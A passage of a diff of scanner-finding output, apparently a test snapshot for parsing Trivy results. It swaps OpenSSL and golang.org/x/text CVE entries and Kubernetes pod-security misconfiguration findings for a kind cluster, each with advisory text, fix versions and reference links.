"https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.4", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1n-0+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.4", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://ubuntu.com/security/notices/USN-5488-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5488-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5169", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/1960321", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", - "id": "AVD-KSV-0110", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://avd.aquasec.com/misconfig/avd-ksv-0110", - ], - }, - "category": "Misconfiguration", - "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", - "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", - "mitigation": "Remove sensitive content from configMap data value", - "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libcrypto3", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, 